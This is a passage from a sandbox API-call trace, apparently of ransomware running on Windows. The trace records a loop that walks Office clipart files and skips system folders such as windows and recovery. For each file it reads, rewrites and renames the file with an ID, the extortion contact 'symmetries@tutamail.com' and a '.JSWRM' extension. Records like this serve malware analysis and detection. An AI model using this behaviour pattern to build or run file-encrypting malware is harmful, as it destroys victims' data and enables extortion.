(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0079.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0079.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0079.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0079.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0079.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.302] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00177_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00177_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0079.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0079.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.303] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x738, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="IN00204_.WMF", cAlternateFileName="")) returned 1 [0079.303] lstrcmpiW (lpString1="IN00204_.WMF", lpString2=".") returned 1 [0079.303] lstrcmpiW (lpString1="IN00204_.WMF", lpString2="..") returned 1 [0079.303] lstrcmpiW (lpString1="IN00204_.WMF", lpString2="...") returned 1 [0079.303] lstrcmpiW (lpString1="IN00204_.WMF", lpString2="windows") returned -1 [0079.303] lstrcmpiW (lpString1="IN00204_.WMF", lpString2="recovery") returned -1 [0079.303] lstrcmpiW (lpString1="IN00204_.WMF", lpString2="perflogs") returned -1 [0079.303] lstrcmpiW (lpString1="IN00204_.WMF", lpString2="documents and settings") returned 1 [0079.303] lstrcmpiW (lpString1="IN00204_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.303] lstrcmpiW (lpString1="IN00204_.WMF", lpString2="system volume information") returned -1 [0079.303] lstrcmpiW (lpString1="IN00204_.WMF", lpString2="msocache") returned -1 [0079.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0079.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00204_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00204_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00204_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0079.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00204_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00204_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00204_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00204_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.304] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1848) returned 1 [0079.304] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x730) returned 0x20c6c0 [0079.304] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x730, lpOverlapped=0x0) returned 1 [0079.305] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.306] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x730, lpOverlapped=0x0) returned 1 [0079.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0079.306] CloseHandle (hObject=0x314) returned 1 [0079.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0079.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0079.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0079.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0079.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0079.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.306] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00204_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00204_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0079.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.307] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2bb6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="IN00233_.WMF", cAlternateFileName="")) returned 1 [0079.307] lstrcmpiW (lpString1="IN00233_.WMF", lpString2=".") returned 1 [0079.307] lstrcmpiW (lpString1="IN00233_.WMF", lpString2="..") returned 1 [0079.307] lstrcmpiW (lpString1="IN00233_.WMF", lpString2="...") returned 1 [0079.307] lstrcmpiW (lpString1="IN00233_.WMF", lpString2="windows") returned -1 [0079.307] lstrcmpiW (lpString1="IN00233_.WMF", lpString2="recovery") returned -1 [0079.307] lstrcmpiW (lpString1="IN00233_.WMF", lpString2="perflogs") returned -1 [0079.307] lstrcmpiW (lpString1="IN00233_.WMF", lpString2="documents and settings") returned 1 [0079.307] lstrcmpiW (lpString1="IN00233_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.307] lstrcmpiW (lpString1="IN00233_.WMF", lpString2="system volume information") returned -1 [0079.307] lstrcmpiW (lpString1="IN00233_.WMF", lpString2="msocache") returned -1 [0079.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0079.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00233_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00233_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00233_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0079.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0079.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00233_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00233_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00233_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0079.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0079.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0079.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00233_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.308] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11190) returned 1 [0079.308] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24d210 [0079.309] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2bb0, lpOverlapped=0x0) returned 1 [0079.311] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.311] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2bb0, lpOverlapped=0x0) returned 1 [0079.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.311] CloseHandle (hObject=0x314) returned 1 [0079.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0079.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0079.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0079.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0079.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0079.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.311] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00233_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00233_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0079.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0079.312] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe00f20a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe00f20a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x764, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="IN00343_.WMF", cAlternateFileName="")) returned 1 [0079.312] lstrcmpiW (lpString1="IN00343_.WMF", lpString2=".") returned 1 [0079.312] lstrcmpiW (lpString1="IN00343_.WMF", lpString2="..") returned 1 [0079.313] lstrcmpiW (lpString1="IN00343_.WMF", lpString2="...") returned 1 [0079.313] lstrcmpiW (lpString1="IN00343_.WMF", lpString2="windows") returned -1 [0079.313] lstrcmpiW (lpString1="IN00343_.WMF", lpString2="recovery") returned -1 [0079.313] lstrcmpiW (lpString1="IN00343_.WMF", lpString2="perflogs") returned -1 [0079.313] lstrcmpiW (lpString1="IN00343_.WMF", lpString2="documents and settings") returned 1 [0079.313] lstrcmpiW (lpString1="IN00343_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.313] lstrcmpiW (lpString1="IN00343_.WMF", lpString2="system volume information") returned -1 [0079.313] lstrcmpiW (lpString1="IN00343_.WMF", lpString2="msocache") returned -1 [0079.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00343_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00343_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00343_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0079.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00343_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00343_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00343_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0079.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0079.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00343_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.314] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1892) returned 1 [0079.314] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x760) returned 0x20c6c0 [0079.314] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x760, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x760, lpOverlapped=0x0) returned 1 [0079.315] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.315] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x760, lpOverlapped=0x0) returned 1 [0079.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0079.316] CloseHandle (hObject=0x314) returned 1 [0079.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0079.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0079.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0079.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0079.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0079.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0079.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.316] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00343_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00343_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | 